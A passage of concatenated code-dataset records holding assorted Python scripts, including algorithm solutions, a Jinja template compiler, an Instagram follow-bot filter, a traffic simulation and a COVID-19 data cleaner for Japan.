Input/Output\n\n# - [execution time limit] 4 seconds (py3)\n# - [input] array.integer inputArray\n# Array of positive integers.\n# Guaranteed constraints:\n# 3 ≤ inputArray.length ≤ 105,\n# 1 ≤ inputArray[i] ≤ 1000.\n# - [input] integer k\n# An integer (not greater than the length of inputArray).\n# Guaranteed constraints:\n# 1 ≤ k ≤ inputArray.length.\n# - [output] integer\n# The maximal possible sum.\n\n# + Solution\n\n# - 7/7\n\n\ndef arrayMaxConsecutiveSum(arr, k):\n prev_sum = sum(arr[:k])\n max_sum = prev_sum\n\n for i in range(k, len(arr)):\n current_sum = prev_sum - arr[i - k] + arr[i]\n prev_sum = current_sum\n\n if current_sum > max_sum:\n max_sum = current_sum\n\n return max_sum\n\n\nprint(arrayMaxConsecutiveSum([2, 3, 5, 1, 6], 2))\n# > 8\n","sub_path":"code-fights/arcade/intro/8-diving-deeper/37-array-max-consecutive-sum.py","file_name":"37-array-max-consecutive-sum.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"134098238","text":"import os\nimport shutil\nimport glob\n\nfrom kubetemplate import utils, helpers\n\n__j = None # Jinja compiler\n\n''' command line compile wrapper. parses command line arguments and .kubetemplate file '''\n# def compile(input_t=None, output_t=None):\ndef compile(\n input_t : 'input target path, defaults to targets in .kubetemplate file' = None,\n output_t : 'output target path if input target path specified, defaults to same directory' = None,\n ):\n if input_t is not None:\n return compile_t(input_t, output_t)\n else: # default to .kubetemplate file\n for t in utils.props()['compiler']['targets']:\n to = t.get('to')\n to = to and utils.root_path(to)\n path = utils.root_path(t['path'])\n compile_t(path, to)\n\n'''\n compile a glob-able path input_t\n output directory ouput_t when input_t is a file or directory, undefined behaviour for glob-able input_t\n'''\ndef compile_t(\n input_t : 'input target path',\n output_t : 'output target path, defaults to same path' = None,\n ):\n\n input_t = os.path.abspath(input_t)\n output_t = output_t and os.path.abspath(output_t)\n\n for g in glob.glob(input_t):\n if os.path.isdir(g):\n for f in [\n os.path.join(di, fi)\n for (di, _, fis) in os.walk(g)\n for fi in fis\n ]:\n outd = output_t \\\n and os.path.join(\n output_t,\n os.path.relpath(f, g)\n ) \\\n or f\n outd = os.path.dirname(outd)\n compile_file(f, outd)\n else:\n outd = output_t or os.path.dirname(input_t)\n compile_file(g, outd)\n\n''' compiles a single file '''\ndef compile_file(input_f, output_d):\n\n global __j\n if __j is None:\n context = utils.props()\n\n context['helpers'] = helpers.helpers\n\n __j = JinjaCompiler('/', context)\n\n path, file_name = os.path.split(input_f)\n fname, ext = os.path.splitext(file_name)\n\n output_prefix = __j.env.globals['config'].get('compiler', {}).get('output_prefix', '')\n\n if ext == '.jinja':\n os.makedirs(output_d, exist_ok=True)\n output_f = os.path.join(output_d, '{}{}'.format(output_prefix, fname))\n\n print(input_f)\n\n __j.compile(input_f, output_f)\n\n return output_f\n\nclass JinjaCompiler:\n def __init__(self, root_dir, config):\n from jinja2 import Environment, FileSystemLoader\n self.env = Environment(loader=FileSystemLoader(root_dir))\n self.env.globals['config'] = config\n\n def compile(self, in_file, out_file, config={}):\n with open(out_file, 'w') as f:\n f.write(self.env.get_template(in_file).render(config))\n","sub_path":"kubetemplate/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"123865043","text":"import math\n\nclass Solution:\n def minimum(self, lst, key):\n cur_min = math.inf\n res = None\n for idx, elem in enumerate(lst):\n k = key(elem)\n if k < cur_min:\n cur_min = k\n res = elem\n return res\n\n def smallestSufficientTeam(self, req_skills, people):\n # base case for recursion\n if req_skills == []:\n return []\n for idx, person in enumerate(people):\n if set(person) == set(req_skills): # when a person have every required skills\n return [idx]\n else: # if there is no such superman :(\n possible_teams = []\n\n for idx, person in enumerate(people):\n if person == []:\n continue\n rec_ans = self.smallestSufficientTeam(\\\n [s for s in req_skills if s not in person],\n people[:idx] + people[idx+1:])\n for r_idx, p_idx in enumerate(rec_ans):\n if p_idx >= idx:\n rec_ans[r_idx] = p_idx + 1\n possible_teams.append([idx] + rec_ans)\n\n return self.minimum(possible_teams, key = len)\n\n\nreq_skills = [\"algorithms\",\"math\",\"java\",\"reactjs\",\"csharp\",\"aws\"]\npeople = [[\"algorithms\",\"math\",\"java\"],[\"algorithms\",\"math\",\"reactjs\"],[\"java\",\"csharp\",\"aws\"],[\"reactjs\",\"csharp\"],[\"csharp\",\"math\"],[\"aws\",\"java\"]]\n\nreq_skills = [\"gvp\",\"jgpzzicdvgxlfix\",\"kqcrfwerywbwi\",\"jzukdzrfgvdbrunw\",\"k\"]\npeople = [[],[],[],[],[\"jgpzzicdvgxlfix\"],[\"jgpzzicdvgxlfix\",\"k\"],[\"jgpzzicdvgxlfix\",\"kqcrfwerywbwi\"],[\"gvp\"],[\"jzukdzrfgvdbrunw\"],[\"gvp\",\"kqcrfwerywbwi\"]]\n\n\nreq_skills = [\"cdkpfwkhlfbps\",\"hnvepiymrmb\",\"cqrdrqty\",\"pxivftxovnpf\",\"uefdllzzmvpaicyl\",\"idsyvyl\"]\npeople = [[],[\"hnvepiymrmb\"],[\"uefdllzzmvpaicyl\"],[],[\"hnvepiymrmb\",\"cqrdrqty\"],[\"pxivftxovnpf\"],[\"hnvepiymrmb\",\"pxivftxovnpf\"],[\"hnvepiymrmb\"],[\"cdkpfwkhlfbps\"],[\"idsyvyl\"],[],[\"cdkpfwkhlfbps\",\"uefdllzzmvpaicyl\"],[\"cdkpfwkhlfbps\",\"uefdllzzmvpaicyl\"],[\"pxivftxovnpf\",\"uefdllzzmvpaicyl\"],[],[\"cqrdrqty\"],[],[\"cqrdrqty\",\"pxivftxovnpf\",\"idsyvyl\"],[\"hnvepiymrmb\",\"idsyvyl\"],[]]\ns = Solution()\n\n# print(s.minimum([1,2,3,4,1,2,3,1], key = lambda x:x%4))\nprint(s.smallestSufficientTeam(req_skills, people))\n# print(list(s.choose_l_items(list(range(10)), 2)))\n","sub_path":"Seungwoo/smallest_sufficient_team.py","file_name":"smallest_sufficient_team.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"16334346","text":"\"\"\"\n Filters\n\"\"\"\n\nimport os\nimport io\n\ndef check_user(self, user_id):\n user_id = self.convert_to_user_id(user_id)\n\n if not user_id:\n return False\n\n if self.whitelist and str(user_id) in self.whitelist:\n return True\n if self.blacklist and user_id in self.blacklist:\n return False\n\n if self.following == []:\n self.following = self.get_user_following(self.user_id)\n if user_id in self.following:\n return False\n\n user_info = self.get_user_info(user_id)\n if not user_info:\n return False # closed acc\n if \"is_business\" in user_info:\n if user_info[\"is_business\"]:\n return False\n if \"is_verified\" in user_info:\n if user_info[\"is_verified\"]:\n return False\n if \"follower_count\" in user_info and \"following_count\" in user_info:\n if user_info[\"follower_count\"] < self.min_followers_to_follow:\n return False\n if user_info[\"follower_count\"] > self.max_followers_to_follow:\n return False\n if user_info[\"following_count\"] < self.min_following_to_follow:\n return False\n if user_info[\"following_count\"] > self.max_following_to_follow:\n return False\n try:\n if user_info[\"follower_count\"] / user_info[\"following_count\"] \\\n > self.max_followers_to_following_ratio:\n return False\n if user_info[\"following_count\"] / user_info[\"follower_count\"] \\\n > self.max_following_to_followers_ratio:\n return False\n except ZeroDivisionError:\n return False\n\n if 'media_count' in user_info:\n if user_info[\"media_count\"] < self.min_media_count_to_follow:\n return False # bot or inactive user\n\n return True\n\ndef check_private(self, user_id):\n if not user_id:\n return True\n\n user_info = self.get_user_info(user_id)\n if \"is_private\" in user_info:\n if user_info[\"is_private\"]:\n return True\n return False\n\ndef convert_to_user_id(self, smth):\n if type(smth) == str and not smth.isdigit():\n if smth[0] == \"@\": # cut first @\n smth = smth[1:]\n smth = self.get_userid_from_username(smth)\n # if type is not str than it is int so user_id passed\n return smth\n","sub_path":"followbot/bot/bot_filter.py","file_name":"bot_filter.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"313785892","text":"# 练习1:华氏温度转换为摄氏温度\n# 提示:华氏温度到摄氏温度的转换公式为:$C=(F - 32) \\div 1.8$\n\nimport math as m\nf = input(\"请输入华氏温度数字(仅可输入数字): \")\nf = float(f)\n\n\ndef f2c(f):\n c = (f - 32) / 1.8\n print(\"华氏温度 %.1f 度 转为摄氏度为 %.1f 度\\n\" % (f, c))\n return c\n\n\nf2c(f)\n\n# 练习2:输入圆的半径计算计算周长和面积\n\nr = input(\"请输入圆的半径: \")\nr = float(r)\n\n\ndef yuan(r):\n girth = m.pi * r * 2\n area = m.pi * r ** 2\n print(\"圆的周长为 %.2f ,圆面积为 %.2f \\n\" % (girth, area))\n\n\nyuan(r)\n\n# 练习3:输入年份判断是不是闰年\n\nwhile True:\n year = input(\"请输入年份(四位数字,仅可判断1900年至2999年): \")\n year = int(year)\n if year < 1900 or year > 2999:\n print(\"\\n输入错误,请重新输入\\n\")\n else:\n break\n\n\ndef yy(year):\n if year % 4 == 0:\n print(\"%d 年是闰年\" % year)\n else:\n print(\"%d 年不是闰年\" % year)\n\n\nyy(year)\n","sub_path":"1218/python100-day01-day15-2.py","file_name":"python100-day01-day15-2.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"243571005","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n__author__ = 'YinJia'\n\nimport xlrd\nimport openpyxl\n\nclass ReadExcel():\n \"\"\"读取excel文件数据\"\"\"\n def __init__(self,fileName, SheetName=\"Sheet1\"):\n self.data = openpyxl.load_workbook(fileName,data_only=True)\n self.table = self.data[SheetName]\n # self.data = xlrd.open_workbook(fileName)\n # self.table = self.data.sheet_by_name(SheetName)\n\n # 获取总行数、总列数\n self.nrows = self.table.max_row\n self.ncols = self.table.max_column\n def read_data(self):\n if self.nrows > 1:\n rows = list(self.table.rows)\n # 获取第一行的内容,列表格式\n keys = []\n # values = []\n listApiData = []\n for k in rows[0]:\n keys.append(k.value)\n # 获取每一行的内容,列表格式\n for row in rows[1:]:\n values = []\n for vrow in row:\n values.append(vrow.value)\n # keys,values组合转换为字典\n api_dict = dict(zip(keys, values))\n listApiData.append(api_dict)\n # print(listApiData)\n self.data.close()\n return listApiData\n else:\n print(\"表格是空数据!\")\n self.data.close()\n return None\n\nif __name__ == '__main__':\n fileName = 'C:\\\\Users\\yamei\\PycharmProjects\\DemoAPI\\database\\DemoAPITestCase.xlsx'\n re = ReadExcel(fileName)\n re.read_data()\n\n","sub_path":"lib/readexcel.py","file_name":"readexcel.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"431656638","text":"\"\"\"\ns18018 - Alexandre B A Villares\nhttps://abav.lugaralgum.com/sketch-a-day\n\nConverting some of Maeda's Design by Number\ndbnletters.dbn code -> Processing\n\"\"\"\n\ndbn_letter = {} # Dict of functions\n \ndef setup():\n parse_dbn_source(\"data/dbnletters.dbn\")\n size(500, 280)\n strokeCap(SQUARE)\n noSmooth()\n noLoop()\n\ndef draw():\n strokeCap(ROUND);\n dbn_sample()\n scale(3,3)\n translate(80,0)\n dbn_sample()\n \ndef dbn_sample():\n for y in range(0, 5):\n for x in range(1, 6):\n dbn_letter[x + y * 5](x * 12, -20 - y * 12)\n dbn_letterZ(x * 12 + 12, -32 - y * 12)\n\ndef parse_dbn_source(file_path, color_mode = False):\n with open(file_path, \"r\") as f:\n dbn_source = f.readlines()\n inside_block = False\n command_name = \"\"\n command_block = []\n for ln in dbn_source:\n if ln.count(\"command\"):\n command_name = ln[14:15]\n elif ln.count(\"{\"):\n inside_block = True\n elif ln.count(\"}\"):\n if command_name in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n def_dbn_letter(command_block, command_name)\n command_block = [] # empty block\n inside_block = False\n elif inside_block:\n command_block.append(ln.lstrip())\n\n\ndef def_dbn_letter(dbn_block, func_key):\n p_block = []\n for dbn_line in dbn_block:\n if dbn_line:\n p_block.append(dbn_line\n .replace(\"line \", \"line(\")\n .replace(\" \", \",\")\n .replace(\"//\", \"#\")\n + \")\")\n # println(\"def dbn_letter\" + func_key)\n def func(h, v):\n with pushMatrix():\n scale(1, -1)\n for ln in p_block:\n # colorMode(HSB)\n # stroke(random(256), 200, 200)\n if ln[0] != \"#\":\n eval(ln)\n\n dbn_letter[func_key] = func\n dbn_letter[ord(func_key) - 64] = func\n globals()[\"dbn_letter\" + func_key] = func\n","sub_path":"parse_dbn_letters/parse_dbn_letters.pyde","file_name":"parse_dbn_letters.pyde","file_ext":"pyde","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"44958020","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 17 11:26:03 2021\n\n@author: axelb\n\"\"\"\n\n\nfrom lights import Traffic_light\nimport pycxsimulator\nfrom matplotlib.pylab import *\nimport matplotlib.cm as cm\nfrom car import Car\nfrom road import Road\nfrom lane import Lane\nfrom intersection_manager import IM, IM2\n\n\nwidth = 23\nheight = 38\n\nfree = 0 # maurdrit\ncarrying = 1 # maurdrit\n\ncarSpawnProb = 0.1 # chance of spawning car at any given tick\n\nstop = 0 # whether car is stop or go\ngo = 1 \n\nrd1Xpos = [10,10] # x values are the same as the road is straight\nrd1Ypos = [0,50] # y value from 0 to 50 as y = 0 on top, 50 on bottom\n\nred = 0 # color of light\ngreen = 1\n\nlightXpos = [10, 10, 40, 40] # x-position of ligth 1, 2, 3, 4 \nlightYpos = [10, 40, 10, 40] # y-position of light 1, 2, 3, 4\n\ndef initialize_2():\n global time, lightAgents, envir, cars\n \n \n time = 0\n road_1 = Road(0, 10, 10)\n car_1 = Car(0, 0)\n cars = []\n\n\ndef initialize():\n global time, lightAgents, envir, cars\n\n time = 0\n \n cars = [] # list of cars\n car = Car(10, 0) # create car object\n cars.append(car) # Spawn new car\n \n lightAgents = [] # list of lights\n for i in range(len(lightXpos)):\n new_light = Traffic_light(lightXpos[i], lightYpos[i]) #[lightXpos[i], lightYpos[i], red] # create light\n lightAgents.append(new_light) # spawn light\n \n # Kode som tegner veiene svart\n envir = zeros([height, width])\n envir[10,:] = 1\n envir[:,10] = 1\n envir[40,:] = 1\n envir[:,40] = 1\n \n \ndef initialize_elgeseter():\n global time, envir, lightAgents, cars, roads, total_traffic, IDIOT_IM, IDIOT_IM2\n time = 0\n cars = []\n lightAgents = []\n roads = []\n # Kode som tegner veiene svart\n envir = zeros([height, width])\n total_traffic = 0\n\n # RNGS\n \n rngs_lane_1 = Lane(7, 7, 0, 10, \"south\", envir)\n rngs_lane_2 = Lane(8, 8, 0, 10, \"south\", envir)\n rngs = [rngs_lane_1, rngs_lane_2]\n rngs_probs = [0.7, 0.3]\n road_north_going_south = Road(\"south\", rngs, rngs_probs, is_spawner=True)\n roads.append(road_north_going_south)\n\n traffic_light_rngs_s = Traffic_light(7, 11, group=1)\n lightAgents.append(traffic_light_rngs_s)\n rngs_lane_1.add_traffic_light('south', traffic_light_rngs_s)\n rngs_lane_2.add_traffic_light('south', traffic_light_rngs_s)\n\n traffic_light_rngs_e = Traffic_light(8, 11, group=2)\n lightAgents.append(traffic_light_rngs_e)\n rngs_lane_2.add_traffic_light('east', traffic_light_rngs_e)\n\n # RNGN\n\n rngn_lane = Lane(10, 10, 10, 0, \"north\", envir)\n rngn = [rngn_lane]\n rngn_probs = [1]\n road_north_going_north = Road(\"north\", rngn, rngn_probs, is_despawner=True)\n roads.append(road_north_going_north)\n\n # RMGN\n\n rmgn_lane_1 = Lane(10, 10, 24, 14, \"north\", envir)\n rmgn_lane_2 = Lane(11, 11, 24, 14, \"north\", envir)\n rmgn = [rmgn_lane_1 ,rmgn_lane_2]\n rmgn_probs = [0.5, 0.5]\n road_middle_going_north = Road(\"north\", rmgn, rmgn_probs)\n roads.append(road_middle_going_north)\n\n traffic_light_rmgn_n = Traffic_light(10, 13, group=1)\n lightAgents.append(traffic_light_rmgn_n)\n rmgn_lane_1.add_traffic_light('north', traffic_light_rmgn_n)\n rmgn_lane_2.add_traffic_light('north', traffic_light_rmgn_n)\n\n # RMGS\n\n rmgs_lane_2 = Lane(8, 8, 14, 24, \"south\", envir)\n rmgs_lane_1 = Lane(7, 7, 14, 24, \"south\", envir)\n rmgs = [rmgs_lane_1 ,rmgs_lane_2]\n rmgs_probs = [0.5, 0.5]\n road_middle_going_south = Road(\"south\", rmgs, rmgs_probs)\n roads.append(road_middle_going_south)\n\n traffic_light_rmgs_s = Traffic_light(7, 25, group=1)\n lightAgents.append(traffic_light_rmgs_s)\n rmgs_lane_1.add_traffic_light('south', traffic_light_rmgs_s)\n rmgs_lane_2.add_traffic_light('south', traffic_light_rmgs_s)\n\n # RNGW\n rngw_lane = Lane(22, 12, 11, 11, \"west\", envir)\n rngw = [rngw_lane]\n rngw_probs = [1]\n road_north_going_west = Road(\"west\", rngw, rngw_probs, is_spawner=True, avg_traffic=500)\n roads.append(road_north_going_west)\n\n rngw_lane.connect_road(road_north_going_north)\n traffic_light_rngw_n = Traffic_light(11, 11, group=2)\n lightAgents.append(traffic_light_rngw_n)\n rngw_lane.add_traffic_light('north', traffic_light_rngw_n)\n\n # RNGE\n rnge_lane = Lane(12, 22, 13, 13, \"east\", envir)\n rnge = [rnge_lane]\n rnge_probs = [1]\n road_north_going_east = Road(\"east\", rnge, rnge_probs, is_despawner=True, avg_traffic=200)\n roads.append(road_north_going_east)\n\n # RSGW\n rsgw_lane = Lane(22, 12, 25, 25, \"west\", envir)\n rsgw = [rsgw_lane]\n rsgw_probs = [1]\n road_south_going_west = Road(\"west\", rsgw, rsgw_probs, is_spawner=True, avg_traffic=500)\n roads.append(road_south_going_west)\n\n traffic_light_rsgw_s = Traffic_light(11, 25, group=2)\n lightAgents.append(traffic_light_rsgw_s)\n rsgw_lane.add_traffic_light('south', traffic_light_rsgw_s)\n\n # RSGE\n rsge_lane = Lane(12, 22, 27, 27, \"east\", envir)\n rsge = [rsge_lane]\n rsge_probs = [1]\n road_south_going_east = Road(\"east\", rsge, rsge_probs, is_despawner=True, avg_traffic=500)\n roads.append(road_south_going_east)\n \n # RSGS\n rsgs_lane_1 = Lane(7, 7, 28, 38, \"south\", envir)\n rsgs_lane_2 = Lane(8, 8, 28, 38, \"south\", envir)\n rsgs = [rsgs_lane_1, rsgs_lane_2]\n rsgs_probs = [0.5, 0.5]\n road_south_going_south = Road(\"south\", rsgs, rsgs_probs, is_despawner=True)\n roads.append(road_south_going_south)\n\n # RSGN\n rsgn_lane_1 = Lane(10, 10, 38, 28, \"north\", envir)\n rsgn_lane_2 = Lane(11, 11, 38, 28, \"north\", envir)\n rsgn = [rsgn_lane_1, rsgn_lane_2]\n rsgn_probs = [0.5, 0.5]\n road_south_going_north = Road(\"north\", rsgn, rsgn_probs, is_spawner=True)\n roads.append(road_south_going_north)\n \n traffic_light_rsgn_n = Traffic_light(10, 27, group=1)\n lightAgents.append(traffic_light_rsgn_n)\n rsgn_lane_1.add_traffic_light('north', traffic_light_rsgn_n)\n rsgn_lane_2.add_traffic_light('north', traffic_light_rsgn_n)\n rsgn_lane_2.add_traffic_light('east', traffic_light_rsgn_n)\n\n # Connecting lanes to roads\n rngs_lane_1.connect_road(road_middle_going_south)\n rngs_lane_2.connect_road(road_middle_going_south)\n rngs_lane_2.connect_road(road_north_going_east)\n \n rngw_lane.connect_road(road_north_going_north)\n \n rsgn_lane_1.connect_road(road_middle_going_north)\n rsgn_lane_2.connect_road(road_middle_going_north)\n rsgn_lane_2.connect_road(road_south_going_east)\n \n rsgw_lane.connect_road(road_south_going_south)\n\n rmgs_lane_1.connect_road(road_south_going_south)\n rmgs_lane_2.connect_road(road_south_going_south)\n\n rmgn_lane_1.connect_road(road_north_going_north)\n rmgn_lane_2.connect_road(road_north_going_north)\n\n IDIOT_IM = IM()\n IDIOT_IM.add_trafic_light(traffic_light_rngw_n)\n IDIOT_IM.add_trafic_light(traffic_light_rngs_s)\n IDIOT_IM.add_trafic_light(traffic_light_rngs_e)\n IDIOT_IM.add_trafic_light(traffic_light_rmgn_n)\n\n IDIOT_IM2 = IM()\n IDIOT_IM2.add_trafic_light(traffic_light_rmgs_s)\n IDIOT_IM2.add_trafic_light(traffic_light_rsgw_s)\n IDIOT_IM2.add_trafic_light(traffic_light_rsgn_n)\n\n\ndef observe():\n cla() # kanskje clearer drit\n imshow(envir, cmap = cm.Greys, vmin = 0, vmax = 1) # shows ilustration\n axis('image')\n xl = [ag.x for ag in lightAgents] # x-verdi for alle lyskryss\n yl = [ag.y for ag in lightAgents] # y-verdi for alle lyskryss\n sl = [ag.current_state for ag in lightAgents] # rødt eller grønt\n x1 = [car.x for car in cars] # x-verdi for alle biler\n y1 = [car.y for car in cars] # y-verdi for alle biler\n s1 = [car.go for car in cars] # stop or go\n scatter(xl, yl, c = sl, cmap = cm.RdYlGn) # tegner noe lyskryssdrit\n scatter(x1, y1, c = s1, cmap = cm.cool) # tegner noe bildrit\n \n title('Elgseter simulation using identical signals\\nt = ' + str(time)+ ' avg traffic = ' + str(int(total_traffic/(time+1)))) # D'Tittel da\n\n\ndef check_if_red_light(car):\n for light in lightAgents:\n xL_dist = abs(car.x - light.x)\n yL_dist = abs(car.y - light.y)\n if np.sqrt(xL_dist**2 + yL_dist**2) -1 == 0 and light.current_state == \"red\":\n return True\n return False\n\ndef get_distance_between_cars(car_1, car_2):\n y_distance = abs(car_1.y - car_2.y)\n x_distance = abs(car_1.x - car_2.x)\n distance = np.sqrt(y_distance**2 + x_distance**2) \n return distance\n\ndef update():\n global time, cars, roads, envir, total_traffic\n\n # Gitt av vi har en list over alle veiene\n for road in roads:\n popped_cars_list = road.trim_lane_ends()\n for popped_car in popped_cars_list:\n cars.remove(popped_car)\n new_car = road.spawn_car_cond()\n if new_car != False: # Hvis bil faktisk ble spawnet\n cars.append(new_car)\n \n for car in cars:\n car.update()\n\n IDIOT_IM.update(time)\n IDIOT_IM2.update(time)\n\n time += 1\n total_traffic += len(cars)\n \n\npycxsimulator.GUI().start(func=[initialize_elgeseter, observe, update])\n\n#PROBLEM I KODEN!:\n'''\nser ut til at når man nå kjører koden, fungerer det meste bra, MEN\nEtterhvert er det kun en og en (eller liten gruppe) bil som kan bevege seg, altså ikke alle\n'''\n","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"591071515","text":"import sys, collections\n\ndirections = [[-1, 0], [1, 0], [0, 1], [0, -1]]\n\ndef read():\n return sys.stdin.readline().rstrip()\n\ndef write(strThing):\n sys.stdout.write(strThing)\n\ndef initMap():\n dimensions = list(map(int, read().split(\" \")))\n locations = [[] for x in range(dimensions[1])]\n\n for thing in range(dimensions[1]):\n row = read()\n locations[thing] = list(row)\n\n return locations\n\ndef findStart():\n for i in range(len(room)):\n for j in range(len(room)):\n if room[i][j] == \"C\":\n return [i, j]\n\ndef bfsPath(queue, room):\n while len(queue) > 0:\n location = queue.popleft()\n\n if room[location[0]][location[1]] == \"W\":\n return location[2]\n\n room[location[0]][location[1]] = \"#\"\n\n for direction in directions:\n if ((location[0] + direction[0] < len(room) and location[0] + direction[0] >= 0) and\n (location[1] + direction[1] < len(room[0]) and location[1] + direction[1] <= 0) and\n room[location[0] + direction[0]][location[1] + direction[1]] != \"X\" and \n room[location[0] + direction[0]][location[1] + direction[1]] != \"#\"):\n\n queue.append([location[0] + direction[0], location[1] + direction[1], location[2] + 1])\n\noutputs = []\n\nfor testcase in range(int(read())):\n paths = collections.deque()\n\n room = initMap()\n start = findStart()\n\n paths.append([start[0], start[1], 0])\n minJumps = bfsPath(paths, room)\n\n output = \"#notworth\" if minJumps >= 60 else str(minJumps)\n outputs.append(output)\n\nfor thing in outputs:\n write(thing) \n\n#suspended cause of that stupid if loop\n#also i didnt check to see if an element is already in the queue\n#note to self: do that later","sub_path":"hs-problems/dmojdmopc13c1p4.py","file_name":"dmojdmopc13c1p4.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"17828078","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom covsirphy.cleaning.country_data import CountryData\n\n\nclass JapanData(CountryData):\n \"\"\"\n Linelist of case reports.\n\n Args:\n filename (str or pathlib.path): CSV filename to save the raw dataset\n force (bool): if True, always download the dataset from the server\n verbose (int): level of verbosity\n\n Notes:\n Columns of JapanData.cleaned():\n - Date (pandas.TimeStamp): date\n - Country (str): 'Japan'\n - Province (str): '-' (country level), 'Entering' or province names\n - Confirmed (int): the number of confirmed cases\n - Infected (int): the number of currently infected cases\n - Fatal (int): the number of fatal cases\n - Recovered (int): the number of recovered cases\n - Tested (int): the number of tested persons\n - Moderate (int): the number of cases who requires hospitalization but not severe\n - Severe (int): the number of severe cases\n \"\"\"\n GITHUB_URL = \"https://raw.githubusercontent.com\"\n URL_C = f\"{GITHUB_URL}/lisphilar/covid19-sir/master/data/japan/covid_jpn_total.csv\"\n URL_P = f\"{GITHUB_URL}/lisphilar/covid19-sir/master/data/japan/covid_jpn_prefecture.csv\"\n # Persons who was tested\n TESTED = \"Tested\"\n # Moderate: cases who requires hospitalization but not severe\n MODERATE = \"Moderate\"\n # Severe\n SEVERE = \"Severe\"\n # Column names\n JAPAN_VALUE_COLS = [\n CountryData.C, CountryData.CI, CountryData.F, CountryData.R,\n TESTED, MODERATE, SEVERE,\n ]\n JAPAN_COLS = [\n CountryData.DATE, CountryData.COUNTRY, CountryData.PROVINCE,\n *JAPAN_VALUE_COLS,\n ]\n\n def __init__(self, filename, force=False, verbose=1):\n Path(filename).parent.mkdir(exist_ok=True, parents=True)\n if Path(filename).exists() and not force:\n self._raw = self.load(filename)\n else:\n self._raw = self._retrieve(filename=filename, verbose=verbose)\n self._cleaned_df = self._cleaning()\n self._country = \"Japan\"\n self._citation = \"Lisphilar (2020), COVID-19 dataset in Japan, GitHub repository, \" \\\n \"https://github.com/lisphilar/covid19-sir/data/japan\"\n\n def _retrieve(self, filename, verbose=1):\n \"\"\"\n Retrieve the dataset from server.\n\n Args:\n filename (str or pathlib.path): CSV filename to save the raw dataset\n verbose (int): level of verbosity\n\n Returns:\n pd.DataFrame: raw dataset\n \"\"\"\n # Show URL\n if verbose:\n print(\n \"Retrieving COVID-19 dataset in Japan from https://github.com/lisphilar/covid19-sir/data/japan\")\n # Download the dataset at country level\n cols = [\n \"Area\", \"Date\", \"Positive\",\n \"Tested\", \"Discharged\", \"Fatal\", \"Hosp_require\", \"Hosp_severe\",\n ]\n c_df = self.load(self.URL_C, header=0).rename(\n {\"Location\": \"Area\"}, axis=1)[cols]\n # Download the datset at province level\n p_df = self.load(self.URL_P, header=0).rename(\n {\"Prefecture\": \"Area\"}, axis=1)[cols]\n # Combine the datsets\n df = pd.concat([c_df, p_df], axis=0, ignore_index=True, sort=True)\n # Save the raw data\n df.to_csv(filename, index=False)\n return df\n\n def _cleaning(self):\n \"\"\"\n Perform data cleaning of the raw data.\n\n Returns:\n pandas.DataFrame: cleaned data\n \"\"\"\n df = self._raw.copy()\n # Rename columns\n df = df.rename(\n {\n \"Area\": self.PROVINCE,\n \"Date\": self.DATE,\n \"Positive\": self.C,\n \"Fatal\": self.F,\n \"Discharged\": self.R,\n \"Hosp_severe\": self.SEVERE,\n \"Tested\": self.TESTED\n },\n axis=1\n )\n # Date\n df[self.DATE] = pd.to_datetime(df[self.DATE])\n # Fill NA values\n for col in [self.C, self.F, self.R, self.SEVERE, \"Hosp_require\", self.TESTED]:\n df[col] = pd.to_numeric(df[col], errors=\"coerce\")\n df = df.groupby(self.PROVINCE).apply(\n lambda x: x.set_index(self.DATE).resample(\"D\").interpolate(\"linear\", limit_direction=\"both\"))\n df = df.fillna(0).drop(self.PROVINCE, axis=1).reset_index()\n df = df.sort_values(self.DATE).reset_index(drop=True)\n # Records at country level (Domestic/Airport/Returnee) and entering Japan(Airport/Returnee)\n e_cols = [\"Airport\", \"Returnee\"]\n e_df = df.loc[df[self.PROVINCE].isin(e_cols)].groupby(self.DATE).sum()\n e_df[self.PROVINCE] = \"Entering\"\n c_cols = [\"Domestic\", \"Airport\", \"Returnee\"]\n c_df = df.loc[df[self.PROVINCE].isin(c_cols)].groupby(self.DATE).sum()\n c_df[self.PROVINCE] = self.UNKNOWN\n df = pd.concat(\n [\n df.loc[~df[self.PROVINCE].isin(c_cols)],\n e_df.reset_index(),\n c_df.reset_index(),\n ],\n ignore_index=True, sort=True)\n # Moderate\n df[self.MODERATE] = df[\"Hosp_require\"] - df[self.SEVERE]\n # Value columns\n df[self.CI] = df[self.C] - df[self.F] - df[self.R]\n df[self.JAPAN_VALUE_COLS] = df[self.JAPAN_VALUE_COLS].astype(np.int64)\n # Country\n df[self.COUNTRY] = \"Japan\"\n return df.loc[:, self.JAPAN_COLS]\n\n def set_variables(self):\n raise NotImplementedError\n","sub_path":"covsirphy/cleaning/japan_data.py","file_name":"japan_data.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"285854121","text":"def NotHappy(cakes):\r\n for cake in cakes:\r\n if cake == '-':\r\n return True\r\n return False\r\n\r\ndef flip(cake):\r\n if cake == 